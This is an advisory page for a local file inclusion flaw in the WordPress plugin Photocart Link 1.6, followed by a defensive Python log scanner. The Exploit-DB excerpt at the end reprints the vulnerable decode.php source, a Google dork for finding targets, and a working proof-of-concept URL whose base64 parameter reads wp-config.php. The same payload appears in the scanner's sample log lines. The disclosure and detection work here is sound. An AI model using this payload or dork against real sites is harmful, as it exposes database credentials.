Vendor: Photocart Link
Author: CrashBandicot @DosPerl
CVSS: 7.5 (HIGH)
Vulnerability type: Local File Inclusion
CWE: 98
Product Name: Photocart Link
Affected Version From: 1.6
Affected Version To: 1.6
Patch Exists: Yes
Related CWE: N/A
CPE: a:wordpress:photocart_link
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: MSWin32
Year: 2016

WordPress Plugin Photocart Link – Local File Inclusion

The WordPress plugin Photocart Link 1.6 is vulnerable to Local File Inclusion. Its decode.php script base64-decodes the id request parameter and passes the result straight to readfile() without validating the path, so an attacker can read sensitive files from the server. In particular, the wp-config.php file, which contains the database credentials, can be read. To exploit this vulnerability, an attacker sends a request to decode.php whose id parameter is the base64 encoding of the path of the file they want to read.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the plugin.
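As an added defender-side example (not part of the advisory or of the plugin's code), the following Python script scans access-log lines for decode.php requests, base64-decodes each id value the way decode.php does, and flags every request whose decoded path would not pass the validation the plugin is missing. The log lines, IP addresses and the is_safe_image_path policy (relative path under the plugin, no traversal, image extensions only) are assumptions made for this example.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Apache combined format), not real traffic:
# a normal image request, the advisory's PoC id, the same id percent-encoded, a non-base64 id.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Mar/2016:10:01:02 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=aW1hZ2VzL3Bob3RvMS5qcGc= HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Mar/2016:10:05:44 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== HTTP/1.1" 200 3019 "-" "curl/7.47.0"
198.51.100.2 - - [27/Mar/2016:10:06:10 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA%3D%3D HTTP/1.1" 200 3019 "-" "curl/7.47.0"
198.51.100.2 - - [27/Mar/2016:10:06:30 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=notbase64 HTTP/1.1" 200 0 "-" "curl/7.47.0"
203.0.113.5 - - [27/Mar/2016:10:07:00 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
ALLOWED_EXT = (".jpg", ".jpeg", ".png", ".gif")  # assumed policy: images only

def id_params(query):
    """Raw id= values; unquote() keeps '+' intact, which parse_qs would turn into a space."""
    for part in query.split("&"):
        key, _, value = part.partition("=")
        if key == "id":
            yield unquote(value)

def decoded_target(raw_id):
    """The path decode.php hands to readfile(), or None when id is not valid base64."""
    try:
        return base64.b64decode(raw_id, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def is_safe_image_path(path):
    """The check the plugin lacks: relative path, no traversal segment, image extension only."""
    if not path or path[0] in "/\\" or ":" in path:
        return False
    segments = path.replace("\\", "/").split("/")
    return ".." not in segments and path.lower().endswith(ALLOWED_EXT)

def scan_log(text):
    """Return (ip, status, decoded path) for every decode.php request that fails the check."""
    hits = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/photocart-link/decode.php"):
            continue  # not the vulnerable script
        for raw in id_params(url.query):
            target = decoded_target(raw)
            if not is_safe_image_path(target):
                hits.append((m.group("ip"), int(m.group("status")), target))
    return hits
```

A status of 200 on a flagged request means the file was served, so those entries are the ones to treat as confirmed disclosure; a non-decodable id (reported as None) is still worth a look as probing.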

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Photocart Link - Local File Inclusion
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-03-27
# Google Dork : inurl:/wp-content/plugins/photocart-link/
# Vendor Homepage: https://fr.wordpress.org/plugins/photocart-link/
# Tested on: MSWin32
# Version: 1.6

# Vuln file : decode.php

<?php
error_reporting(0);
header("Cache-control: private"); 
$new =  base64_decode($_REQUEST['id']);
header("Content-type: image/jpeg");
header("Content-transfer-encoding: binary\n"); 
header("Content-Disposition: filename=do_not_copy_these_images");
header('Cache-control: no-cache');
@readfile($new);
?>

# PoC : /wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==

# Right click -> Save As -> and read the saved file with Notepad

# 27/03/2016 - Vendor Informed about Issues